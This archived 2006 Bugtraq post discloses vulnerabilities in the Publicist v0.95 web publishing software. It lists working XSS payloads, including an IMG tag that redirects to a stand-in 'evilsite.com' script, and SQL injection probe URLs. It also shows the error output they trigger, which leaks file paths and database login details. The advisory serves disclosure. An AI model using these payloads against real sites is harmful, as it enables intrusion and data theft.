lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060523080110.24297.qmail@securityfocus.com>
Date: 23 May 2006 08:01:10 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Publicist v0.95 - XSS And Full Path Errors


Publicist v0.95 

Homepage:
http://publicist.kau.se/ 

Description:
Publicist is a free web server software, created for web papers, that allows groups of people to write and publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express themselves). 

-------------------------------------- 

Exploits & Vulnerabilities: 

Full path and SQL Query errors: 

Type the following in login box: [BODY ONLOAD=alert('XSS')]
and it produces: 

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.example. com/left.php on line 63 

SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3' 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.publicist. kau.se/count.php on line 6 Unable to process query: You have an error in your SQL syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1 

SQL Injection on visa variable: 
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund' 

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/ hitlist_editorial_public_info.php on line 73 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com /hitlist_editorial_public_info.php on line 74 



Submiting html tags in the comment boxes produces this SQL queue error: 

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7 



XSS Vulnerability: 

An XSS attack is possible by entering in the comment box some html code like this: 

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')] 

It should also be noted that calling the files c_getMsg.php, c_getUser.php, count.php, display full path errors and contain mysql connect info: 

Example of the above errors: 

Warning: mysql_connect(): Access denied for user: 'example@...alhost' (Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ